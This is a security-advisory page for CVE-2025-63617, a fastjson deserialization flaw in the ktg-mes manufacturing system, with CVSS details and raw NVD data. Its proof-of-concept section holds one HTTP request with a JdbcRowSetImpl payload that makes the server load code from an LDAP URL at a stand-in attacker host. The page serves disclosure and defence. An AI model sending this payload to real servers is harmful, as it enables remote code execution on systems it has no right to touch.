Security Vulnerability Report
中文
CVE-2025-63617 CVSS 6.5 MEDIUM

CVE-2025-63617

Published: 2025-11-10 21:15:40
Last Modified: 2026-02-05 15:10:48

Description

ktg-mes before commit a484f96 (2025-07-03) has a fastjson deserialization vulnerability. This is because it uses a vulnerable version of fastjson and deserializes unsafe input data.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kutangguo:ktg-mes:*:*:*:*:*:*:*:* - VULNERABLE
ktg-mes < a484f96 (2025-07-03)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
POST /api HTTP/1.1 Host: target.com Content-Type: application/json {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63617", "sourceIdentifier": "[email protected]", "published": "2025-11-10T21:15:39.743", "lastModified": "2026-02-05T15:10:47.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ktg-mes before commit a484f96 (2025-07-03) has a fastjson deserialization vulnerability. This is because it uses a vulnerable version of fastjson and deserializes unsafe input data."}, {"lang": "es", "value": "ktg-mes anterior al commit a484f96 (2025-07-03) tiene una vulnerabilidad de deserialización de fastjson. Esto se debe a que utiliza una versión vulnerable de fastjson y deserializa datos de entrada inseguros."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kutangguo:ktg-mes:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-10-08", "matchCriteriaId": "82530E5A-0C20-4939-AE97-07F65117B6DF"}]}]}], "references": [{"url": "https://gist.github.com/ChangeYourWay/8651679a2155269bccf520fcb34fc661", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChangeYourWay/post/blob/main/ktg-mes.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}